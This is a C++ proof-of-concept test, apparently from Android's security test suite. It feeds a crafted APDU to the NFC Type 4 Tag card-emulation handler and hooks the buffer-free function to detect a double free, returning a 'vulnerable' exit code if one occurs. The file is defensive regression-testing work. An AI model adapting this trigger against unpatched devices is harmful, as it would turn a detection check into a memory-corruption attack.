1 /**
2 * Copyright (C) 2022 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #include <ce_int.h>
18 #include <dlfcn.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include "../includes/common.h"
22
23 extern tNFC_CB nfc_cb;
24
25 extern tCE_CB ce_cb;
26
27 static void (*real_GKI_freebuf)(void *ptr) = nullptr;
28
29 bool isInitialized = false;
30
31 bool isVulnerable = false;
32
33 bool isTestInProgress = false;
34
35 struct myPtr {
36 void *ptr = nullptr;
37 bool isFreed = false;
38 };
39
40 struct myPtr vulnerablePtr;
41
init()42 void init() {
43 real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
44 if (!real_GKI_freebuf) {
45 return;
46 }
47 isInitialized = true;
48 }
49
nfc_start_quick_timer(TIMER_LIST_ENT *,uint16_t,uint32_t)50 void nfc_start_quick_timer(TIMER_LIST_ENT *, uint16_t, uint32_t) {
51 return;
52 }
53
nfc_stop_timer(TIMER_LIST_ENT *)54 void nfc_stop_timer(TIMER_LIST_ENT *) {
55 return;
56 }
57
nfc_stop_quick_timer(TIMER_LIST_ENT *)58 void nfc_stop_quick_timer(TIMER_LIST_ENT *) {
59 return;
60 }
61
GKI_freebuf(void * ptr)62 void GKI_freebuf(void *ptr) {
63 if (!isInitialized) {
64 init();
65 }
66 if (isTestInProgress) {
67 if (ptr == vulnerablePtr.ptr) {
68 if (vulnerablePtr.isFreed) {
69 isVulnerable = true;
70 } else {
71 vulnerablePtr.isFreed = true;
72 }
73 }
74 }
75 real_GKI_freebuf(ptr);
76 }
77
poc_cback(tRW_EVENT,tRW_DATA *)78 void poc_cback(tRW_EVENT, tRW_DATA*) {
79 }
80
main()81 int main() {
82 tNFC_ACTIVATE_DEVT p_activate_params = { };
83 p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
84 p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
85 RW_SetActivatedTagType(&p_activate_params, &poc_cback);
86 FAIL_CHECK(rw_cb.p_cback == &poc_cback);
87
88 GKI_init();
89
90 FAIL_CHECK(ce_select_t4t() == NFC_STATUS_OK);
91
92 ce_cb.mem.t4t.selected_aid_idx = CE_T4T_MAX_REG_AID;
93 ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;
94
95 tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
96 tNFC_CONN *p_data = (tNFC_CONN *) GKI_getbuf(sizeof(tNFC_CONN));
97 p_data->data.p_data = (NFC_HDR *) GKI_getbuf(sizeof(NFC_HDR) + 1);
98
99 NFC_HDR *p_c_apdu = (NFC_HDR *) p_data->data.p_data;
100 vulnerablePtr.ptr = p_c_apdu;
101
102 p_c_apdu->len = 1;
103 p_c_apdu->offset = 0;
104 uint8_t *p = (uint8_t *) (p_c_apdu + 1) + p_c_apdu->offset;
105 p[0] = T4T_CMD_CLASS;
106
107 isTestInProgress = true;
108 uint8_t conn_id = 1;
109 p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
110 isTestInProgress = false;
111
112 return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
113 }
114